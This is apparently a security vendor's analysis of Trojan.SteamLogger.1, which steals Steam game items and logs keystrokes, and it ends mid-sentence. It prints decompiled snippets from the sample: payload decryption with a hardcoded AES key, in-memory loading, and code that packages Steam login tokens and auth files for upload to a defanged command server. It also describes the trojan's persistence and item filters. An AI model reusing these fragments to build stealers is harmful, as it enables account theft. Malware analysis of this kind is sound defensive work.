This malicious program is designed to steal valuable game assets, tools, and artifacts from users of the Steam gaming platform, mostly from fans of Dota 2, Counter-Strike: Global Offensive, and Team Fortress 2.However, it can easily be tweaked to steal assets of other games. It also logs key strokes and transmits the information to criminals.
The Trojan consists of three modules: a dropper, a service module and the main module. When Trojan.SteamLogger.1 is executed, it decrypts and extracts the main and the service modules from its body. The decryption is performed in two steps:
- Reading an image into the memory with little modification:
public static byte[] D(byte[] text) { byte[] array = new byte[text.Length]; for (int i = 0; i < text.Length; i++) { array[i] = Convert.ToByte((int)text[i] - i - 27); } return array; } - . Decrypting with AES algorithm:
private static byte[] code = new byte[] //AES key { 149, 133, 127, 135, 145, 135, 134, 144, 147, 141, 159, 138, 136 }; public byte[] SymmetricDecrypt(byte[] input, byte[] key) { byte[] result; using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) { rijndaelManaged.BlockSize = 128; rijndaelManaged.KeySize = 256; byte[] array = new byte[16]; byte[] rgbIV = new byte[array.Length]; Array.Copy(input, 0, array, 0, array.Length); byte[] array2 = new byte[input.Length - array.Length]; Array.Copy(input, array.Length, array2, 0, array2.Length); rijndaelManaged.Mode = CipherMode.ECB; rijndaelManaged.Padding = PaddingMode.None; using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(key, null)) { rgbIV = cryptoTransform.TransformFinalBlock(array, 0, array.Length); } rijndaelManaged.Mode = CipherMode.CBC; rijndaelManaged.Padding = PaddingMode.PKCS7; using (ICryptoTransform cryptoTransform2 = rijndaelManaged.CreateDecryptor(key, rgbIV)) { using (MemoryStream memoryStream = new MemoryStream(array2)) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform2, CryptoStreamMode.Read)) { byte[] array3 = new byte[array2.Length]; int num = cryptoStream.Read(array3, 0, array3.Length); byte[] array4 = new byte[num]; Array.Copy(array3, 0, array4, 0, num); result = array4; } } } } return result; }
After decrypting, the dropper stores the service module in the %TEMP% folder as Update.exe and launches it, the main module is loaded into system memory by means of the Assembly.Load() routine:
Assembly assembly = Assembly.Load(array);
program.Invoke(assembly, assembly.EntryPoint);
Then, the malware loads the graphics file from hxxp://keys-trade.ru/trade/?image= and saves it to the infected computerinto the %TEMP% folder as %process_name%.jpg, after this immediately displays the image on the screen:
The service module checks whether the folder %ProgramFiles%"+ " (x86)\Common Files\Steam\ is present and if it is not, the module creates it. After that, the module copies itself to this folder under the name SteamService.exe and sets the attributes for the executable as “system” and “hidden”, and then changes the key of the registry entry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, responsible for launching applications automatically, and launches the service module.
Being loaded on an infected computer, the service module sends a request to the cybercriminals' command and control server by means of the POST method(hxxp://keys-trade.ru/bot/check="),and, if the instruction “OK” is not returned, it attempts to establish a connection to the command and control server via any of the proxy servers on its hardcoded list.
The Trojan transmits information about the infected computer to the command and control server at hxxp://keys-trade.ru/bot/. The data includes the operating system version, platform, as well as the unique malware's identifier, generated using the serial number of the hard disk that contains the C partition. In addition, in 50-minute intervals the Trojan sends the remote server a POST request, and upon receipt of a download instruction, the malware downloads and installs the updated version of the service module, by replacing the stored executable file in %TEMP%\Update.exe.
When launched, the Trojan's main module checks whether the command and control server is available and after initialization it searches the infected system memory for a Steam process and verifies whether the user has logged onto the Steam server under their account. If not, the malicious program waits for the server to authorize a player and then extracts information about the Steam account (the availability of SteamGuard, steam-id, security token) and sends the data to cybercriminals. Then the Trojan waits for the string containing data for the future transmission of game items from the compromised account. The string is as follows:
steam-id,partner,token|steam-id,partner,token|...
where steam-id, partner, token are parameters for the trade request.
After this, the Trojan searches for Steam files in the folder by means of the "ssfn*" mask and creates the following string:
ssfn_filename_1|ssfn_file1_data||ssfn_filename_2|ssfn_file2_data||...
extracts files stored in the config\ folder of the Steam application and generates the same string from these data. The Trojan than appends the generated string to the existing one and replaces the character set "-" with "". After that, the data of victim's account are appended to tend of the result string which is then encoded with the BASE64 algorithm:
text = text + "steamLogin.txt|" + this.ToStrByte(this._token) + "||";
text = text + "steamLoginSecure.txt|" + this.ToStrByte(this._login_secure) + "||";
string text6 = text;
text = string.Concat(new string[]
{
text6,
"steamMachineAuth",
this._steam_id,
".txt|",
this.ToStrByte(this._machine_auth)
});
byte[] inArray = this.Compress(Encoding.UTF8.GetBytes(text));
text = "steam_id=" + this._steam_id + "&receive=" + Convert.ToBase64String(inArray);
The malicious program gets a list of accounts to which game items from the compromised account can be transferred. All the collected data are sent to the criminals' server after which the Trojan checks whether automatic authorization is enabled in the Steam settings. If the feature is disabled, the malware creates a separate thread to run the keylogger. Information about logged key strokes will be sent to the attackers in 15-second intervals.
To search for the inventory and valuable in-game items, the Trojan uses the following filters:
private static int[] games = new int[]
{
570,
730,
440
};
string[] source = new string[]
{
"Mythical",
"Legendary",
"Arcana",
"Immortal"
};
string[] source2 = new string[]
{
"DOTA_WearableType_Treasure_Key"
};
string[] source3 = new string[]
{
"Container",
"Supply Crate"
};
The malware filters items for Dota 2, Counter Strike: Global Offensive and Team Fortress 2. In other words, the Trojan attempts to steal the most valuable in-game items, chests and chest keys. Trojan.SteamLogger.1 also monitors whether players attempt to sell any of the virtual items themselves, and if they do, it automatically removes the items from the sale dialog box. All the stolen virtual items are transferred to cybercriminals' accounts.
To sell Dota 2 chest keys, the malware authors have even created a special eStore:
